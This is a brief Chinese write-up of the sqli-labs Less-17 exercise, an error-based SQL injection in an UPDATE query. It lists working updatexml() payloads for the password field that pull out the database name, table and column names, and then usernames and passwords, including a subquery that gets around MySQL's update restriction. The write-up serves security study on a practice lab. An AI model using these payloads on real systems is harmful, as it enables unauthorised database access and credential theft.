less-17
Less-17 Update Query- Error based - String
看对话框是新建用户,是update
语句,所以应该是用update
语句注入
update <表名> set <列名=更新值> [where <更新条件>]
-
看
update
语句就知道应该是在密码上注入,输入uname=admin&passwd=admin' and 1=1--+&submit=Submit
会报错,所以应该使用报错注入(图放错了) -
在burp抓包后放进重放器然后直接粘贴就行
# 数据库 uname=admin&passwd=1233' and (select updatexml(1,concat('~',database()),1))--+&submit=Submit # 表 uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1))--+ &submit=Submit # 列 uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1))--+ &submit=Submit
-
爆数据
uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from users)),1))--+ &submit=Submit
发现会报错:
You can't specify target table 'users' for update in FROM clause
大概就是:你不能在
update
一张表的时候再select
一张表可以使用子查询来绕过
# 爆用户名 uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(username) from (select * from users) as a)),1))--+ &submit=Submit # 密码 uname=admin&passwd=11223' and (select updatexml(1,concat('~',(select group_concat(password) from (select * from users) as a)),1))--+ &submit=Submit